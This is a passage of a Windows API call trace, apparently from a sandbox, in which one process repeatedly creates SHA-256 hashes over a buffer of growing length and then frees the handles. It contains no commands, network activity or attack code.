	[0229.843] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ce78
	[0229.843] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ce78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ce78, pdwDataLen=0x128ba4) returned 1
	[0229.843] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.843] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.843] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.844] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.844] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0229.844] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cea0
	[0229.844] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cea0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cea0, pdwDataLen=0x128ba4) returned 1
	[0229.844] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.844] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.844] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.844] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.844] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0229.844] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.844] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cec8
	[0229.844] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cec8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cec8, pdwDataLen=0x128ba4) returned 1
	[0229.844] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.844] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.844] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.845] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.845] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0229.845] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cef0
	[0229.845] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cef0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cef0, pdwDataLen=0x128ba4) returned 1
	[0229.845] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.845] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.845] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.845] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.845] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0229.845] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.845] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cf18
	[0229.845] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cf18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cf18, pdwDataLen=0x128ba4) returned 1
	[0229.845] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.845] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.845] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.846] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.846] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0229.846] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cf40
	[0229.846] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cf40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cf40, pdwDataLen=0x128ba4) returned 1
	[0229.846] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.846] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.846] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.846] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.846] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0229.846] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.846] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cf68
	[0229.846] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cf68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cf68, pdwDataLen=0x128ba4) returned 1
	[0229.846] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.846] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.846] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.847] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.847] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0229.847] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cf90
	[0229.847] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cf90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cf90, pdwDataLen=0x128ba4) returned 1
	[0229.847] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.847] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.847] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.847] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.847] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0229.847] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.847] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cfb8
	[0229.847] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cfb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cfb8, pdwDataLen=0x128ba4) returned 1
	[0229.847] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.847] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.847] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.848] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.848] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0229.848] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cfe0
	[0229.848] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cfe0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cfe0, pdwDataLen=0x128ba4) returned 1
	[0229.848] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.848] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.848] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.848] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.848] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0229.848] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.848] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d008
	[0229.848] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d008, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d008, pdwDataLen=0x128ba4) returned 1
	[0229.848] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.848] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.849] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.849] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.849] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0229.849] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d030
	[0229.849] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d030, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d030, pdwDataLen=0x128ba4) returned 1
	[0229.849] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.849] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.849] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.849] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.849] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0229.849] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d058
	[0229.849] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d058, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d058, pdwDataLen=0x128ba4) returned 1
	[0229.850] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.850] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.850] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.850] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.850] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0229.850] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d080
	[0229.850] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d080, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d080, pdwDataLen=0x128ba4) returned 1
	[0229.850] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.850] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.850] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.850] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.850] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0229.850] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.850] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d0a8
	[0229.850] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d0a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d0a8, pdwDataLen=0x128ba4) returned 1
	[0229.851] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.851] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.851] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.852] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.852] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0229.852] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d0d0
	[0229.852] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d0d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d0d0, pdwDataLen=0x128ba4) returned 1
	[0229.852] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.852] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.852] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.852] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.852] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0229.852] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.852] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d0f8
	[0229.852] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d0f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d0f8, pdwDataLen=0x128ba4) returned 1
	[0229.852] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.852] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.852] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.853] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.853] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0229.853] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d120
	[0229.853] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d120, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d120, pdwDataLen=0x128ba4) returned 1
	[0229.853] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.853] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.853] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.853] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.853] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0229.853] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.853] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d148
	[0229.853] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d148, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d148, pdwDataLen=0x128ba4) returned 1
	[0229.853] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.853] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.853] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.854] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.854] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0229.854] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.854] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d170
	[0229.854] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d170, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d170, pdwDataLen=0x128ba4) returned 1
	[0229.854] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.854] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.854] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.854] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.854] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0229.854] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.854] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d198
	[0229.854] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d198, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d198, pdwDataLen=0x128ba4) returned 1
	[0229.854] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.854] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.854] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.855] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.855] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0229.855] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d1c0
	[0229.855] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d1c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d1c0, pdwDataLen=0x128ba4) returned 1
	[0229.855] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.855] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.855] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.855] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.855] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0229.855] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.855] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d1e8
	[0229.855] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d1e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d1e8, pdwDataLen=0x128ba4) returned 1
	[0229.855] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.855] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.855] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.856] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.856] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0229.856] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.856] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d210
	[0229.856] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d210, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d210, pdwDataLen=0x128ba4) returned 1
	[0229.856] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.856] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.856] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.856] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.856] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0229.856] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.856] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d238
	[0229.856] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d238, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d238, pdwDataLen=0x128ba4) returned 1
	[0229.856] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.856] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.856] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.857] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.857] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa00, dwFlags=0x0) returned 1
